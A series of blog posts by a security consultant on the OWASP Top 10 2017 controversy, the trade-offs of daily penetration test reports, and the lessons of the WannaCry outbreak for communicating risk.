Author: Josh Grossman

The OWASP Top 10 — An update and a chance to have your say

New developments

You can read my previous blog post about the flap around RC1 of the OWASP Top 10. Since then, there have been a number of important developments.

The first and biggest was that it was decided that the previous project leaders, Dave Wichers and Jeff Williams would be replaced by Andrew van der Stock, who himself has extensive experience in AppSec and OWASP. Andrew later brought in Neil Smithline and Torsten Gigler to assist him in leading the project and Brian Glas (who performed some excellent analysis on RC1) to assist with data analysis of newly collected data.

Next, the OWASP Top 10 was extensively discussed at the OWASP summit in May considering both how it got to where it is today and how it should continue in the future.

Key Outcomes and my Thoughts

The outcomes from the summit can be seen here and here and the subsequent decisions by the project team by the project team are documented here. The most important points (IMHO) that came out of these sessions and the subsequent decisions were as follows:

  • There is a plan in place to require multiple project leaders from multiple organisations for all OWASP flagship projects to try and avoid the independence issues I discussed in my previous post.
  • It is almost certain that the controversial A7 (Insufficient Attack Protection) and A10 (Underprotected APIs) the RC1 will not appear in the next RC or final version. The reason given is similar to my reason in a previous post. These aren’t vulnerabilities (or more specifically vulnerability categories). I am really pleased with this decision and I think it will make it much more straightforward to explain and discuss the Top 10 in a coherent way.
  • A7 and A10 were intended to be occupied by “forward looking” items. This will remain the case and this discussion will be opened up to the community by way of a survey where AppSec professionals can provide their feedback on the additional vulnerability categories which they expect to be most important over the next few years. The survey is only open until 30th August 2017 and is available here. I would strongly recommend that anyone with AppSec knowledge/experience takes the time to complete this for the the good of the new Top 10 version.
  • Additional time is being provided to supply data to be used in assessing the rest of the Top 10. The window is only open until 18th September 2017 and is available here. I’m not honestly sure what the benefit of gathering additional data on the 8 current vulnerability categories is aside from practice for next time.
  • An updated release timeline has been set with RC2 being targeted for 9th October 2017 to allow for feedback and additional modifications before the final release targeted for 18th November 2017.
  • In general, transparency is to be increased with feedback and preparation processes to be primarily based in the project’s Github repository going forward.
  • The OWASP Top 10 is “art” and not science. It is partially data based but intended to be significantly judgment based as well. We need to be clear about this when we are talking about the project.
  • The OWASP Top 10 is for everyone but especially CISOs rather than for developers. It is intended to capture the most high risk vulnerability categories. Once again, developers, especially those working on a new project, should be using the OWASP Top 10 Proactive Controls project as their first reference rather than the main OWASP Top 10.

Conclusion

I am very pleased with the way this has turned out so far. I think that the concerns over such an important project have been taken seriously and steps have been taken to protect the integrity of the project and safeguard its future. I think Andrew, Neil, Torsten and Brian are in a great position to carry on the huge efforts which Dave and Jeff put into this project and maintain it’s position of OWASP’s defacto #1 project.

At the same time, I think that this episode has provided an insight into the efforts and contributions required to progress an OWASP project, shown how an open approach leads to better feedback and contributions and also highlighted other OWASP projects which are complimentary to the Top 10. Overall, I think people should see this story as a positive outcome of a collaborative approach and feel encouraged to take part and contribute to this project and other OWASP projects.

Daily Pen Test reports — Pros and Cons

For some clients where we perform security testing, the client requests that we report on all findings on a daily basis.

Now, I am 100% behind reporting progress in terms of what has been tested (assuming there are multiple elements) or more importantly reporting problems in progressing as soon as possible. However, there are still some clients where they expect this plus findings to be reported.

I wanted to jot down some thoughts on some pros and cons to this approach.

Advantages

A1: Feeling of progress

The client feels like we are working, progressing and finding stuff. (Although status reporting without findings should also mostly accomplish this).

A2: Immediate feedback and fix

The client receives immediate feedback on findings and can start to look at how to fix them even before we finish testing.

They may even be able to fix the finding and allow us to retest before the end of testing. I am always a little wary of the client making changes to an application in the middle of testing but if they are going to fix something but break something else that is going to happen regardless of if it happens during the test or after the test.

A3: Enforces reporting as you go

There is a tendency for consultants to save all the reporting for the end of the project. Hopefully they took enough screenshots along the way but even still, suddenly you are at the end of the project and you have 20 findings to write up. Having a daily report ensures that findings are written up as they are found, whilst they are still fresh in mind.

Disadvantages

D1: Time consuming

Whilst we would have to write up all findings anyway, it is still more time consuming to have to prepare a report daily. The report has to go through a QA process every day instead of just once and if it is necessary to combine reports from multiple people, it can get even more complicated. Especially if we are using a complex reporting template.

D2: Difficult to update already reported findings

Sometimes we will find something and only afterwards find another angle or another element to the issue which means that the finding needs to be updated. This leads to more duplicated effort with the finding being reviewed multiple times and the client having to read and understand the finding multiple times.

D3: Less time to consider findings in detail

Sometimes it takes some time to consider the real impact of a finding. For example, what is the real risk from this finding, can it only be performed by an administrator? Will it only be relevant in certain circumstances? Having to rush the finding out in a daily report loses that thinking time and can lead to an inaccurate initial risk rating.

D4: Getting the report ready in time

Every day becomes a deadline day with a race to get the report ready in time. It can disrupt the testing rhythm and mean that consultants have to break from testing to prepare the daily report therefore losing focus and momentum.

D5: Expectation of linear progress

Testing doesn’t progress in a linear fashion. A consultant might spend a lot of time trying to progress on particular test on one day or on another day find a bunch of quick, lower risk findings. A daily report creates an expectation of news every day and a feeling that no news means a lack of progress.

D6: Increase likelihood of mistakes

With the increased pressure of daily output, the likelihood of mistakes is also increased as report preparers are under pressure to deliver the daily report by the deadline and reviewers are under pressure to quickly release the report to the client.

D7: It might not even get to the client!

If there are a few people in the review process, if just one of them is delayed in looking at the report and they have a query, the report may not make it to the client in time to be relevant before the next day’s report is released anyway!

D8: One size doesn’t fit all

Once you get into the habit of expecting daily reports or you create that expectation with the client, suddenly it is expected for any project regardless of whether it makes sense. This can mean that ongoing discussion with the client is discouraged because “we’re doing a daily report anyway” or alternatively a project which requires in depth thought and research is being constantly disturbed with unhelpful daily reports.

Conclusions

I agree that is is a bad idea to do a load of testing and then only weeks later the client finally sees some output. Especially where there are particularly serious findings that immediately expose the client to serious risk.

However, the need to provide a continual stream of updates leads to time inefficiency, lower quality findings and disturbs the progression of the test.

As such, whilst the reporting format should be discussed at the start of the project with the client, the aim should be to agree on the following points by communicating the reasons discussed in this post:

  1. If this is a large project where there are multiple parts which are being tested one after the other in a short time-frame then it is worth reporting on progress over these parts on a daily basis.
  2. Problems with testing should always be reported as soon as possible plus a daily status update on these issues to make sure these are not forgotten.
  3. Critical threats which immediately put the client at severe risk should always be reported as soon as possible.
  4. If the application is currently under development or there is specific pressure to deliver key findings as fast as possible, then high risk findings or medium risk findings can be delivered during the course of the test but should not be restricted to a strictly daily frequency.

Additionally:

  • If this is a short project (up to a week) without lots of different elements or if this a long project (several months) then daily status reporting is not appropriate.
  • Reporting of all findings on a strictly daily basis will never be appropriate.

I was recently involved in an application security testing project for a large client covering around 20 applications with multiple consultants working simultaneously in just three weeks of testing. By discussing with the client up front and agreeing on points 1, 2 and 3 above we kept the client fully in the loop whilst not burdening ourselves with reporting every tiny detail everyday.

I will probably update this post as I think of more advantages/disadvantages but feel free to send me feedback in the comments or via Twitter.

WannaCry — Do you feel lucky?

Was it just ransomware?

During the hysteria around the WannaCry ransomware outbreak, a thought struck me:

A bit later on, I responded to another post where someone had suggested that we were “lucky” that it was only ransomware.

https://twitter.com/JoshCGrossman/status/863991233869484032

As I responded, the only thing that was “lucky” about this story was the fact that the WannaCry outbreak finally brought well-deserved attention to the incredibly dangerous exploits leaked by the TheShadowBrokers in April.

How bad is a vulnerability?

I blogged about these exploits on my employer’s blog, precisely because we wanted to make sure that the company’s clients had the relevant information to protect themselves. We don’t blog about every vulnerability or issue that comes to light but the unique danger posed by this leak meant that we decided it was important that we prepared advice. Like I said there, this probably the worst Windows vulnerability since 2008.

Given the overall panic, it seems that despite the leak of *working exploits*, MS17–010 was still not taken seriously enough by Microsoft or by the Industry. Microsoft in particular stuck to their guns and didn’t patch XP and 2003 for non-paying customers until it became prudent from a PR perspective.

We in the Information Security industry need to find a better way of communicating the risk posed by a security issue. The frustrating “branded vulnerabilities” trend has led to risk assessment based on logo quality rather than actual potential for damage.

The fact is that as noted in the 2016 DBIR (page 16), the most dangerous vulnerabilities are those for which real public exploits exist such as in Metasploit. TheShadowBroker’s release effectively met that criteria but despite this the outcry was less than something like Heartbleed or the damp squib which was Badlock.

Just patch it?

It is clear that there are plenty of organisations where patching is difficult or impossible. For organisations where it is difficult, security professionals need to help these organisations “choose their battles” where MS17-010 should have been a battle that was fought and won as soon as TheShadowBroker’s leak of live exploits was shown to be related to it.

However, for places where patching is impossible and to be honest in all mature organisations, the focus needs to shift to an “anticipate breach” posture whereby it is almost assumed that attackers will get in through unpatched vulnerabilities or just plain old phishing. In this model, the goal becomes preventing and detecting lateral movement through segmentation and better behavioural logging.

In Conclusion

So, in some ways maybe we got lucky that WannaCry drew so much attention to MS17–010 because it should now be easier to get buy-in to patch some of these specific flaws, just in time for the Metasploit module release (remember the DBIR metric above?)

However, despite this we must ask ourselves now, what other quiet malware was able to infiltrate Company networks whilst this flaw remained unpatched or unconsidered? We have already seen a couple of examples of this.

We need to be better at articulating risk regarding known issues but we also need the detective controls to be ready for the unknown issues as well.

OWASP Top 10 2017 — What should be there?

https://www.flickr.com/photos/samchurchill/4182826573

But first…

Before I start on that, I think it is important to acknowledge the enormous amount work which Jeff Williams, Dave Wichers and others have put into the OWASP Top 10. Their efforts have made it into the best known OWASP project and certainly the one thing that anyone in technology knows about Application Security. The current controversy and discussion has only arisen due to the project’s high profile and it is important to give credit to those who made that happen.

My background

I have a decade of IT Risk experience with the last few years mostly focussed on Application Security testing. In this time I have seen, tested and found vulnerabilities in web applications of many different sizes, types and technologies. At the same time I have also had experience explaining these vulnerabilities to client contacts and helping developers with practical mitigations. As such, whilst I cannot provide detailed statistics, I think I can provide a fair assessment of the key issues that web application developers are struggling with today.

More importantly, I work as a security consultant and have no actual or perceived allegiance to any solution or service. My interest is that we have effective tools and materials to help clients better understand application security risk overall.

So what should the Top 10 look like?

I have seen at least one criticism of the OWASP Top 10 which states that most of the categories should no longer be relevant. Unfortunately, recent experience has shown that many companies are still struggling with the basics and therefore many of the existing categories which have stayed in the OWASP Top 10 should remain. Here are my thoughts about the changes.

The Good: Removal of 2013 A10 — Unvalidated Redirects and Forwards

A good change in my opinion. This is clearly still a risk but is probably not serious enough to be in the Top 10. I had a call with a client not long ago where I was trying to mentally run through the Top 10 to guide the conversation and this one didn’t come to mind at all.

The Good con’t: 2017 A4 — Broken Access Control

This is a great change that makes explaining the list a lot easier. 2013 A4 and 2013 A7 were just too similar for such a short list and it made explaining things difficult.

The Bad(ish): 2017 A10 — Underprotected APIs

I can appreciate that this is a big enough issue that merits its own item even though fundamentally the security risks of APIs will include many of the other items in the Top 10.

Currently the text of 2017 A10 just talks about standard vulnerabilities that can affect all application types. I think that maybe this item should be a little more focussed on issues which are more specific to APIs or “AJAX” style applications which use APIs for populating their web pages.

For example, it should specifically talk about Mass Assignment style vulnerabilities where the API framework blindly accepts parameters and updates the database without checking them against a whitelist or the opposite issue where it provides too many data items in a response, e.g. the password field from the database.

It should also highlight the perils of mis-configuring Cross Origin Resource Sharing headers which can effectively disable the same origin policy. Maybe also risks of JSONP.

I would rename it to simply “API Vulnerabilities”

The Ugly: 2017 A7 — Insufficient Attack Protection

Lets set aside the independence issues that I have previously discussed.

I have spent a long time wrestling with defining IT Risk and IT Security Risk and one of the key principles I have found is that a risk cannot just be the absence of a control.

This new item is describing the absence of a controls in an application. Other items in the list describe broken controls but this is the only one which actually talks about the absence of a new set of controls.

I 100% agree that the future of application security is applications which can better protect themselves. Clearly this is a widely-held view which is why OWASP already has OWASP Top 10 Proactive Controls which has “Implement Logging and Intrusion Detection” control as its #8. This seems like the correct place for explaining what attack protection measures should be implemented.

I therefore think that this item should not appear in the list at all but rather the “Implement Logging and Intrusion Detection” control should be enhanced with the content leaving the Top 10 Risks containing only actual risks.

One spot left

So I have one spot currently untaken on the Top 10, what will I choose?

Ironically, I agree with one of Contrast Security’s suggestions. Deserialisation Vulnerabilities should have their own spot on the Top 10.

I have the following reasons for this:

  • These issues have been around for a long time and have never received enough attention. They only really came to light in 2015 and are still poorly understood.
  • I think one of the reasons for this is that they are hard to understand and hard to casually exploit, especially within the confined time-frame of security testing.
  • They clearly affect a number of heavily used languages.
  • The severity is often critical leading to full Remote Code Execution on the web server, usually from the external Internet.
  • There are plenty of off-the-shelf products which are vulnerable to this. Some of them have been patched to fix it, the older ones have not.
  • Fixing the issue is not always straightforward or trivial.

In conclusion

I have already said previously that I think the OWASP Top 10 risks concept needs revamping and I stand by that.

However, in the short term, I think that the keeping the focus on actual security risks, especially those which are poorly understood will add the most value to the OWASP Top 10 2017. The Top 10 is a key tool for helping companies to understand and focus their application security efforts but this will only remain the case if the list remains internally consistent and relevant.

The OWASP Top 10 — Response to the controversy from Jeff Williams

https://www.owasp.org/

The official response

Following my previous post about the OWASP Top 10 as well as the reaction from many others, Steve Ragan at CSO Online reached out to Contrast Security for their comments on the inclusion of “Insufficient Attack Protection” as the new A7.

Jeff Williams who is one of the OWASP Top 10 Co-Authors as well as being the CTO for Contrast Security provided the response. My thoughts as follows:

Contributions to the Project

The project is open for anyone to participate in. Unfortunately, like most OWASP projects, it is a huge amount of work and very very few contribute.

I think this a fair and important point. As I previously highlighted, there was a minimal response to the original call for data with only 11 companies responding with relatively large datasets and 13 additional companies with smaller datasets. As I said in my previous post and in my conclusion again here, OWASP needs more feedback and more contributors.

The proactive addition of items

The project uses the open data call data to select and prioritize issues, but has also always looked to experts for ideas on what we could include that would drive the appsec community to get in front of problems instead of being reactive. In 2007 it was CSRF, which is still a top ten item supported by tons of data. In 2013 it was use of libraries with known vulnerabilities, again an obvious yet serious and underappreciated problem, and the T10 helped to refocus the industry on it.

Again, I think this is a fair point. Being forward-looking and pro-active is important in such a fast-moving industry.

Certainly in hindsight, “CSRF” and “Libraries with Known Vulnerabilities” were worthy additions to previous releases of the Top 10 but note that they are both “Risks”, i.e. an issue/problem in the application. This is in keeping with the official title of the OWASP Top 10 which is “the OWASP Top 10 Web Application Security Risks”.

In this case, “Insufficient Attack Protection” is not a “Risk”, it is the lack of a “Control”. Note that OWASP already has a less famous but also very valuable Top 10 Proactive Controls list which already has as its item #8 “Implement Logging and Intrusion Detection”.

Moreover, despite the assertion above that the project has “looked to experts for ideas”, there is still no evidence of any discussion or consultation about the inclusion of A7 as I discussed in my previous post nor is any further information on this provided in this response.

Lack of a Control ≠ a Risk

Depending on where you observe the problem from, isn’t the lack of a defense a security vulnerability? It just depends on what we expect from our code, our vantage point on security.

Lack of defence is certainly an issue but in order to decide which controls should be put in place to defend an application, we first have to decide on the risks/vulnerabilities that are most concerning and prioritise accordingly.

The OWASP Top 10 was supposed to highlight the biggest risks to consider and including a control as part of this list confuses this assessment and takes up a space which could be taken by an actual application security risk.

Much of the appsec industry is focused on creating clean code, rather than protecting against attacks. But clearly we need both, as all the focus on hygiene hasn’t worked.

Agreed and again, I imagine this is why “Implement Logging and Intrusion Detection” is on the Top 10 Proactive Controls list.

In conclusion

Disappointingly, the response does not substantively address what I think is one of the key concerns with the latest release which is the lack of an appearance of independence. The response does not provide any further information to fill in the gap between the raw data and the final list nor demonstrate which other experts may have been consulted outside of the project team.

I think the response’s final sentence clearly demonstrates what the next steps should be:

I hope everyone interested in helping with the OWASP T10 will participate in the process, and discuss the pros and cons of this latest release candidate.

I set out my opinions for the future of the Top 10 risks project in my previous post but it is clear that there will still be a 2017 release.

The official instructions on the OWASP Top 10 site state:

Constructive comments on this OWASP Top 10–2017 Release Candidate should be forwarded via email to OWASP-TopTen@lists.owasp.org. Private comments may be sent to dave.wichers@owasp.org. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the items listed in the Top 10 should include a complete suggested list of 10 items, along with a rationale for any changes. All comments should indicate the specific relevant page and section.

I would therefore urge anyone in the application security industry to provide public comments by June 30, 2017 as has been requested by the project team. If enough constructive comments are submitted in the requested format, we will be in a good position at the final release of the list to assess to what extent the project team has taken the industry’s feedback into consideration.

Behind the The OWASP Top 10 2017 RC1

The power of OWASP

OWASP (The Open Web Application Security Project) was started in 2001 and describes itself as a:

“…worldwide not-for-profit charitable organization focused on improving the security of software”

The project has been enormously successful in reputation terms and is now considered the primary source of knowledge and truth when it comes to Web Application security.

In my job as an IT Security Consultant, I see many examples of companies relying on OWASP and the OWASP Top 10 Web Application Security Risks (hereafter “the OWASP Top 10”) and even considering the OWASP Top 10 as a de facto standard.

I have seen the following real life examples of this (without discussing whether each company is making correct use of the terminology):

  • Companies engaging with a software supplier will require them to have a secure development life-cycle which complies with OWASP guidelines.
  • Companies want us to provide (potentially based on own their client requirements) secure development training which covers the OWASP Top 10.
  • Companies expect that when we provide them with Application Security testing services, we follow a recognised methodology such as that set out by OWASP
  • Companies require us to provide an Application Security testing report which maps our findings to the OWASP Top 10. (We don’t like doing this as clearly the OWASP Top 10 cannot cover all types of findings)
  • Companies want us to provide just a “quick test” which “just covers the OWASP Top 10”. (We don’t do this!)
  • Companies want us to provide them with a “certification” that their application “complies” with the OWASP Top 10. (Good lord, no!)

The OWASP reality

The fact is that there are a large number of very high quality products and resources from OWASP (my personal favourites being OWASP ZAP, the OWASP Testing Guide and OWASP Juice Shop.

However, the quality of OWASP resources will generally be based on how much effort its unpaid volunteers are able or willing to put in and how much assistance they receive. For example, the OWASP ESAPI (Enterprise Security API) project was at one time a flagship project but was “demoted”, an action which its Java project owner agreed with. Its wiki page now recommends considering other alternatives before considering ESAPI.

To paraphrase the blog post above, not enough people were willing/able to spend time developing/maintaining it.

I don’t think that the ESAPI example should be considered to detract from the overall benefits which OWASP brings to the community but I think that people do not necessarily understand the relatively narrow base on which OWASP rests and the reliance on certain key people.

The OWASP Top 10 itself is considered a Flagship project and justifiably so given its success over the last 15 years. However…

Appearance of independence

Early in my professional life, I worked at a Big 4 accountancy firm where the idea of “independence” was drummed into me. In the Big 4 context, this is relevant for “Auditor Independence” where a Financial Auditor firm and its staff must demonstrate that they are able to perform a completely unbiased review of a company’s financial reporting without being exposed to external pressures which prevent it from being impartial such as a financial interest or inducement.

We were told that a Financial Auditor must both “be independent” and “be seen to be independent”. This second definition effectively means that even something that just looks like it would threaten independence, even if it does not, should be considered as a risk and avoided as carefully as an actual independence risk.

http://kfknowledgebank.kaplan.co.uk/KFKB/Wiki%20Pages/Audit%20and%20compliance.aspx

The OWASP Top 10 RC1 — Appearing independent

A Release Candidate of the OWASP Top 10 2017 was released a few weeks ago. Many people with more experience than I have debated both the technical merits of the latest release candidate and also examined the underlying data on which it was based.

However, I want to highlight a key point. The new items in the list are A7 — Insufficient Attack Protection and A10 — Underprotected APIs. Specifically about A7, the 2017 introduction says:

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 5)

I don’t want to get into the merits of this new item but the analysis which I noted above highlights that there were three companies who suggested an idea similar to the new A7 risk, “Network Test Labs Inc.”, “Shape Security” and “Contrast Security”.

From: https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true

Shape Security are a vendor who make anti-automation software.

The vulnerability data which they have provided for the OWASP Top 10 relates to anti-automation and nothing else. They have recommended one additional item for the OWASP Top 10 and that is the problem which they can solve (h/t to Andrew Kalat at the Defensive Security Podcast).

Similarly, Network Test Labs also only provided vulnerability data in the anti-automation category and no other. They have performed some very limited research to support this:

We chose 3 US companies that had many users (as evidenced by their Alexa ratings) and were sizeable ($1B+ revenue) along with 2 other large US companies. We used a simple Selenium test to login to a website with 5 sets of credentials, 4 fake and 1 real. On 3 of the websites we tested, all 5 login attempts were possible, including the real set of credentials.

Finally, one of Contrast Security’s key products is a RASP (Runtime Application Self Protection) solution:

The new OWASP Top 10 2017 RC draft specifically name-drops “RASP” as a possible way of addressing the new A7 Insufficient Attack Protection risk.

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 14)

Additionally, Contrast Security’s CTO and co-founder is Jeff Williams who is also the OWASP Top 10 Project Creator and co-author. It is important to note however that Jeff does have an impressive history in OWASP And AppSec in general.

Contrast Security was also the only contributor to suggest the other new risk which was added “A10 — Underprotected APIs”.

Having the​ only two new risks coming from one company with such a close tie to the OWASP Top 10 does not have the appearance of independence. Whilst, there is no attempt to disclose or highlight this connection in the OWASP Top 10 material, the company itself is already using the new Top 10 (which is technically still only a release candidate) in its marketing.

https://www.contrastsecurity.com/security-influencers/owasp-top-10-for-2017

Final Thoughts

The OWASP Top 10 project clearly provides its raw data sources but as the nVisium blog referenced above notes, the process between the raw data and the final Top 10 is not clear.

Additionally the Top 10 document states:

https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf (Page 3)

In my opinion, the process by which the new OWASP Top 10 release candidate has been produced does not have the appearance of independence and it is not currently clear whether it can demonstrate actual independence due to the missing link between the data and the end result.

On the other hand, as I noted above OWASP is entirely dependent on volunteers who are prepared to put time and effort into the its projects and therefore it can only work with what it has.

I think the response to this has to be three-fold.

  1. In the short term, I think the OWASP Top 10 project has to more clearly articulate its limitations. I would like to think that if the issues I have set out above were communicated correctly to companies and policy writers, they would understand the limitations and we would see less use of the OWASP Top 10 as a de facto standard. Companies should be using the more comprehensive Testing Guide and the ASVS (Application Security Verification Standard) as a starting point, potentially cherry picking the areas which will be most relevant to them.
  2. Perhaps the OWASP Top 10 Web Application Security Risks needs to be a data/risk driven view of the key issues which are being seen in the wild with more frequent updates but less focus on preparing a detailed and complex document. The focus should be on an ordered list of specific issues rather than trying to compress lots of issues into a top 10 list. The OWASP Top 10 Proactive Security controls which is a really useful and practical document for developers should be based on the this list of top issues (but not one-to-one) and provide actual hands-on ways to address security the most common security issues from the original list.
  3. Finally, the industry needs to be more involved in contributing to efforts like these. Only 11 companies contributed the vast majority of the data for the OWASP Top 10. I will certainly be encouraging my employer to start collecting the data required to submit and I think it is important that others do as well.

OWASP and its volunteers have worked hard to build this brand and reputation and it is our responsibility to help maintain and develop this.

Update: In a subsequent post, James Kettle pointed out that a similar issue involving Contrast Security has occurred in the past.